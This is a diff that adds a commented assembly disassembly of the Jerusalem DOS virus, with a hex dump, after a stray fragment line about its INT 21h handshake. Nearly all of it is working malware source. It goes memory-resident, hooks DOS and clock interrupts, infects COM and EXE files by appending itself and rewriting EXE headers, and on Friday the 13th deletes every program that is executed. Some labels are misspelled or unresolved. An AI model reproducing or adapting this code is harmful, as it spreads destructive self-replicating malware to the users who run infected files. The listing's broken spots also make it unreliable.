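`AH=0E0H` handshake that the resident copy answers with `AX=300H`.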
@@ -0,0 +1,882 @@ + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) 
;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + 
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... 
+ JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE + JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? 
+ PUSH CX ; + PUSH SI ; + MOV CX,4001H ; + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX 
;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECT PROCESS SEEMS TO OCCUR HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 
+ JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... 
+ INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; 
+;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] 
; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. 
+;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. +;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... +;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. 
+;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u +;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( +;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX +;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. +;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P +;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! +;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ +;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. +;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. +;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... +;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... +;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)... +;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 +;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. +;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... +;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR +;0450 